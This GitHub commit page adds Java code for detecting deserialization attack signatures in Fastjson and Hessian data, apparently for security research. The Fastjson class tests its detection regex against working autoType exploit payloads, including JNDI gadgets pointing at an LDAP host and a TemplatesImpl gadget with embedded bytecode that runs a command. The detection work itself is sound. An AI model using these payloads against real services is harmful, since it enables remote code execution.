Skip to content

Commit 91f5208

Browse files
author
“threedr3am”
committed
Merge branch 'feat/data-feature'
# Conflicts: # pom.xml
2 parents 143b5e5 + 5468097 commit 91f5208

14 files changed

+1078
-0
lines changed

feature/pom.xml

Lines changed: 58 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,58 @@
1+
<?xml version="1.0" encoding="UTF-8"?>
2+
<project xmlns="http://maven.apache.org/POM/4.0.0"
3+
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
4+
xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
5+
<parent>
6+
<artifactId>learn-java-bug</artifactId>
7+
<groupId>com.xyh</groupId>
8+
<version>1.0-SNAPSHOT</version>
9+
</parent>
10+
<modelVersion>4.0.0</modelVersion>
11+
12+
<artifactId>feature</artifactId>
13+
14+
<dependencies>
15+
<dependency>
16+
<groupId>com.caucho</groupId>
17+
<artifactId>hessian</artifactId>
18+
<version>4.0.38</version>
19+
</dependency>
20+
21+
<dependency>
22+
<groupId>com.esotericsoftware</groupId>
23+
<artifactId>kryo</artifactId>
24+
<version>4.0.0</version>
25+
</dependency>
26+
27+
<dependency>
28+
<groupId>com.esotericsoftware.yamlbeans</groupId>
29+
<artifactId>yamlbeans</artifactId>
30+
<version>1.09</version>
31+
</dependency>
32+
33+
<dependency>
34+
<groupId>org.yaml</groupId>
35+
<artifactId>snakeyaml</artifactId>
36+
<version>1.17</version>
37+
</dependency>
38+
39+
<dependency>
40+
<groupId>org.jyaml</groupId>
41+
<artifactId>jyaml</artifactId>
42+
<version>1.3</version>
43+
</dependency>
44+
45+
<dependency>
46+
<groupId>com.thoughtworks.xstream</groupId>
47+
<artifactId>xstream</artifactId>
48+
<version>1.4.9</version>
49+
</dependency>
50+
51+
<dependency>
52+
<groupId>com.alibaba</groupId>
53+
<artifactId>fastjson</artifactId>
54+
<version>1.2.62</version>
55+
</dependency>
56+
</dependencies>
57+
58+
</project>

feature/src/main/java/com/threedr3am/bug/feature/CAS4$1And4$2.java

Lines changed: 11 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,11 @@
1+
package com.threedr3am.bug.feature;
2+
3+
/**
4+
*
5+
* CAS 4.1.x-4.1.6 and 4.1.7-4.2.x 反序列化攻击特征
6+
*
7+
* @author threedr3am
8+
*/
9+
public class CAS4$1And4$2 {
10+
11+
}

feature/src/main/java/com/threedr3am/bug/feature/FastjsonSerialization.java

Lines changed: 55 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,55 @@
1+
package com.threedr3am.bug.feature;
2+
3+
import java.util.regex.Pattern;
4+
5+
/**
6+
*
7+
* Fastjson autoType 序列化数据特征
8+
*
9+
* @author threedr3am
10+
*/
11+
public class FastjsonSerialization {
12+
13+
static Pattern pattern = Pattern.compile("[\"']@(t|(\\\\u0074)|(\\\\x74))(y|(\\\\u0079)|(\\\\x79))(p|(\\\\u0070)|(\\\\x70))(e|(\\\\u0065)|(\\\\x65))[\"']\\s*?:");
14+
15+
public static void main(String[] args) {
16+
printAndMatch("{\"@type\":\"org.apache.commons.proxy.provider.remoting.SessionBeanProvider\",\"jndiName\":\"ldap://localhost:43658/Calc\",\"Object\":\"a\"}");
17+
printAndMatch("{\"@type\":\"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\",\"_bytecodes\":[\"yv66vgAAADQANAoACAAkCgAlACYIACcKACUAKAcAKQoABQAqBwArBwAsAQAGPGluaXQ+AQADKClW\n"
18+
+ "AQAEQ29kZQEAD0xpbmVOdW1iZXJUYWJsZQEAEkxvY2FsVmFyaWFibGVUYWJsZQEABHRoaXMBACFM\n"
19+
+ "Y29tL3RocmVlZHIzYW0vYnVnL2Zhc3Rqc29uL0NtZDsBAAl0cmFuc2Zvcm0BAHIoTGNvbS9zdW4v\n"
20+
+ "b3JnL2FwYWNoZS94YWxhbi9pbnRlcm5hbC94c2x0Yy9ET007W0xjb20vc3VuL29yZy9hcGFjaGUv\n"
21+
+ "eG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhkb2N1bWVu\n"
22+
+ "dAEALUxjb20vc3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvRE9NOwEACGhhbmRs\n"
23+
+ "ZXJzAQBCW0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFs\n"
24+
+ "aXphdGlvbkhhbmRsZXI7AQAKRXhjZXB0aW9ucwcALQEApihMY29tL3N1bi9vcmcvYXBhY2hlL3hh\n"
25+
+ "bGFuL2ludGVybmFsL3hzbHRjL0RPTTtMY29tL3N1bi9vcmcvYXBhY2hlL3htbC9pbnRlcm5hbC9k\n"
26+
+ "dG0vRFRNQXhpc0l0ZXJhdG9yO0xjb20vc3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3Nlcmlh\n"
27+
+ "bGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRsZXI7KVYBAAhpdGVyYXRvcgEANUxjb20vc3VuL29yZy9h\n"
28+
+ "cGFjaGUveG1sL2ludGVybmFsL2R0bS9EVE1BeGlzSXRlcmF0b3I7AQAHaGFuZGxlcgEAQUxjb20v\n"
29+
+ "c3VuL29yZy9hcGFjaGUveG1sL2ludGVybmFsL3NlcmlhbGl6ZXIvU2VyaWFsaXphdGlvbkhhbmRs\n"
30+
+ "ZXI7AQAIPGNsaW5pdD4BAAFlAQAVTGphdmEvbGFuZy9UaHJvd2FibGU7AQANU3RhY2tNYXBUYWJs\n"
31+
+ "ZQcAKQEAClNvdXJjZUZpbGUBAAhDbWQuamF2YQwACQAKBwAuDAAvADABADYvQXBwbGljYXRpb25z\n"
32+
+ "L0NhbGN1bGF0b3IuYXBwL0NvbnRlbnRzL01hY09TL0NhbGN1bGF0b3IMADEAMgEAE2phdmEvbGFu\n"
33+
+ "Zy9UaHJvd2FibGUMADMACgEAH2NvbS90aHJlZWRyM2FtL2J1Zy9mYXN0anNvbi9DbWQBAEBjb20v\n"
34+
+ "c3VuL29yZy9hcGFjaGUveGFsYW4vaW50ZXJuYWwveHNsdGMvcnVudGltZS9BYnN0cmFjdFRyYW5z\n"
35+
+ "bGV0AQA5Y29tL3N1bi9vcmcvYXBhY2hlL3hhbGFuL2ludGVybmFsL3hzbHRjL1RyYW5zbGV0RXhj\n"
36+
+ "ZXB0aW9uAQARamF2YS9sYW5nL1J1bnRpbWUBAApnZXRSdW50aW1lAQAVKClMamF2YS9sYW5nL1J1\n"
37+
+ "bnRpbWU7AQAEZXhlYwEAJyhMamF2YS9sYW5nL1N0cmluZzspTGphdmEvbGFuZy9Qcm9jZXNzOwEA\n"
38+
+ "D3ByaW50U3RhY2tUcmFjZQAhAAcACAAAAAAABAABAAkACgABAAsAAAAvAAEAAQAAAAUqtwABsQAA\n"
39+
+ "AAIADAAAAAYAAQAAABAADQAAAAwAAQAAAAUADgAPAAAAAQAQABEAAgALAAAAPwAAAAMAAAABsQAA\n"
40+
+ "AAIADAAAAAYAAQAAAB0ADQAAACAAAwAAAAEADgAPAAAAAAABABIAEwABAAAAAQAUABUAAgAWAAAA\n"
41+
+ "BAABABcAAQAQABgAAgALAAAASQAAAAQAAAABsQAAAAIADAAAAAYAAQAAACIADQAAACoABAAAAAEA\n"
42+
+ "DgAPAAAAAAABABIAEwABAAAAAQAZABoAAgAAAAEAGwAcAAMAFgAAAAQAAQAXAAgAHQAKAAEACwAA\n"
43+
+ "AGEAAgABAAAAErgAAhIDtgAEV6cACEsqtgAGsQABAAAACQAMAAUAAwAMAAAAFgAFAAAAFAAJABcA\n"
44+
+ "DAAVAA0AFgARABgADQAAAAwAAQANAAQAHgAfAAAAIAAAAAcAAkwHACEEAAEAIgAAAAIAIw==\"],\"_name\":\"a.b\",\"_tfactory\":{},\"_outputProperties\":{}}");
45+
printAndMatch("{,,,\"@type\" :\"com.zaxxer.hikari.HikariConfig\",\"metricRegistry\":\"ldap://localhost:43658/Calc\"}");
46+
printAndMatch("{'@type':\"org.apache.xbean.propertyeditor.JndiConverter\",\"asText\":\"ldap://localhost:43658/Calc\"}");
47+
printAndMatch("[{'@type\":\"java.lang.Class\",\"val\":\"com.sun.rowset.JdbcRowSetImpl\"},{\"@type\":\"com.sun.rowset.JdbcRowSetImpl\",\"dataSourceName\":\"ldap://localhost:43658/Calc\",\"autoCommit\":true}]");
48+
}
49+
50+
private static void printAndMatch(String json) {
51+
System.out.println("------------------------------------------------------------");
52+
System.out.println(json);
53+
System.out.println(pattern.matcher(json).find());
54+
}
55+
}

feature/src/main/java/com/threedr3am/bug/feature/HessianSerialization.java

Lines changed: 222 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,222 @@
1+
package com.threedr3am.bug.feature;
2+
3+
import com.caucho.hessian.io.AbstractHessianOutput;
4+
import com.caucho.hessian.io.HessianOutput;
5+
import com.caucho.hessian.io.HessianProtocolException;
6+
import com.caucho.hessian.io.Serializer;
7+
import com.caucho.hessian.io.SerializerFactory;
8+
import com.caucho.hessian.io.UnsafeSerializer;
9+
import com.caucho.hessian.io.WriteReplaceSerializer;
10+
import java.io.ByteArrayOutputStream;
11+
import java.io.IOException;
12+
import java.io.Serializable;
13+
import java.util.HashMap;
14+
import java.util.Map;
15+
16+
/**
17+
*
18+
* Hessian序列化数据特征
19+
*
20+
* 4d 74 00 ... 7a
21+
*
22+
* @author threedr3am
23+
*/
24+
public class HessianSerialization implements Serializable {
25+
26+
public static void main(String[] args) throws IOException {
27+
printAndMatch(object1());
28+
printAndMatch(object1_());
29+
printAndMatch(object2());
30+
printAndMatch(object2_());
31+
printAndMatch(object3());
32+
printAndMatch(object3_());
33+
printAndMatch(object4());
34+
printAndMatch(object4_());
35+
printAndMatch(object5());
36+
printAndMatch(object5_());
37+
printAndMatch(object6());
38+
printAndMatch(object6_());
39+
}
40+
41+
private static void printAndMatch(byte[] bytes) {
42+
StringBuilder stringBuilder = new StringBuilder();
43+
for (int i = 0; i < bytes.length; i++) {
44+
stringBuilder.append(String.format("\\x%x ", bytes[i]));
45+
}
46+
System.out.println(stringBuilder.toString());
47+
System.out.println(stringBuilder.toString().replaceAll(" ", "").contains("\\x4d\\x74\\x0"));
48+
}
49+
50+
private static byte[] object1() throws IOException {
51+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
52+
AbstractHessianOutput out = new HessianOutput(bos);
53+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
54+
sf.setAllowNonSerializable(true);
55+
out.setSerializerFactory(sf);
56+
out.writeString("test");
57+
out.close();
58+
return bos.toByteArray();
59+
}
60+
61+
private static byte[] object1_() throws IOException {
62+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
63+
AbstractHessianOutput out = new HessianOutput(bos);
64+
out.writeString("test");
65+
out.close();
66+
return bos.toByteArray();
67+
}
68+
69+
private static byte[] object1_2() throws IOException {
70+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
71+
AbstractHessianOutput out = new HessianOutput(bos);
72+
out.writeString("threedr3am");
73+
out.close();
74+
return bos.toByteArray();
75+
}
76+
77+
private static byte[] object2() throws IOException {
78+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
79+
AbstractHessianOutput out = new HessianOutput(bos);
80+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
81+
sf.setAllowNonSerializable(true);
82+
out.setSerializerFactory(sf);
83+
out.writeObject(new A());
84+
out.close();
85+
return bos.toByteArray();
86+
}
87+
88+
private static byte[] object2_() throws IOException {
89+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
90+
AbstractHessianOutput out = new HessianOutput(bos);
91+
out.writeObject(new A());
92+
out.close();
93+
return bos.toByteArray();
94+
}
95+
96+
private static byte[] object3() throws IOException {
97+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
98+
AbstractHessianOutput out = new HessianOutput(bos);
99+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
100+
sf.setAllowNonSerializable(true);
101+
out.setSerializerFactory(sf);
102+
out.writeObject(new B(new A()));
103+
out.close();
104+
return bos.toByteArray();
105+
}
106+
107+
private static byte[] object3_() throws IOException {
108+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
109+
AbstractHessianOutput out = new HessianOutput(bos);
110+
out.writeObject(new B(new A()));
111+
out.close();
112+
return bos.toByteArray();
113+
}
114+
115+
private static byte[] object4() throws IOException {
116+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
117+
AbstractHessianOutput out = new HessianOutput(bos);
118+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
119+
sf.setAllowNonSerializable(true);
120+
out.setSerializerFactory(sf);
121+
out.writeObject(new HessianSerialization());
122+
out.close();
123+
return bos.toByteArray();
124+
}
125+
126+
private static byte[] object4_() throws IOException {
127+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
128+
AbstractHessianOutput out = new HessianOutput(bos);
129+
out.writeObject(new HessianSerialization());
130+
out.close();
131+
return bos.toByteArray();
132+
}
133+
134+
private static byte[] object5() throws IOException {
135+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
136+
AbstractHessianOutput out = new HessianOutput(bos);
137+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
138+
sf.setAllowNonSerializable(true);
139+
out.setSerializerFactory(sf);
140+
Map<String, String> map = new HashMap<>();
141+
map.put("test", "test");
142+
map.put("foo", "foo");
143+
out.writeObject(map);
144+
out.close();
145+
return bos.toByteArray();
146+
}
147+
148+
private static byte[] object5_() throws IOException {
149+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
150+
AbstractHessianOutput out = new HessianOutput(bos);
151+
Map<String, String> map = new HashMap<>();
152+
map.put("test", "test");
153+
map.put("foo", "foo");
154+
out.writeObject(map);
155+
out.close();
156+
return bos.toByteArray();
157+
}
158+
159+
private static byte[] object6() throws IOException {
160+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
161+
AbstractHessianOutput out = new HessianOutput(bos);
162+
NoWriteReplaceSerializerFactory sf = new NoWriteReplaceSerializerFactory();
163+
sf.setAllowNonSerializable(true);
164+
out.setSerializerFactory(sf);
165+
Map<String, String> map = new HashMap<>();
166+
map.put("test", "test");
167+
out.writeObject(map);
168+
out.close();
169+
return bos.toByteArray();
170+
}
171+
172+
private static byte[] object6_() throws IOException {
173+
ByteArrayOutputStream bos = new ByteArrayOutputStream();
174+
AbstractHessianOutput out = new HessianOutput(bos);
175+
Map<String, String> map = new HashMap<>();
176+
map.put("test", "test");
177+
out.writeObject(map);
178+
out.close();
179+
return bos.toByteArray();
180+
}
181+
182+
static class A implements Serializable {}
183+
static class B implements Serializable {
184+
A a;
185+
186+
public B(A a) {
187+
this.a = a;
188+
}
189+
}
190+
191+
public static class NoWriteReplaceSerializerFactory extends SerializerFactory {
192+
193+
/**
194+
* {@inheritDoc}
195+
*
196+
* @see com.caucho.hessian.io.SerializerFactory#getObjectSerializer(java.lang.Class)
197+
*/
198+
@Override
199+
public Serializer getObjectSerializer ( Class<?> cl ) throws HessianProtocolException {
200+
return super.getObjectSerializer(cl);
201+
}
202+
203+
204+
/**
205+
* {@inheritDoc}
206+
*
207+
* @see com.caucho.hessian.io.SerializerFactory#getSerializer(java.lang.Class)
208+
*/
209+
@Override
210+
public Serializer getSerializer ( Class cl ) throws HessianProtocolException {
211+
Serializer serializer = super.getSerializer(cl);
212+
213+
if ( serializer instanceof WriteReplaceSerializer) {
214+
return UnsafeSerializer.create(cl);
215+
}
216+
return serializer;
217+
}
218+
219+
}
220+
221+
222+
}

0 commit comments

Comments
 (0)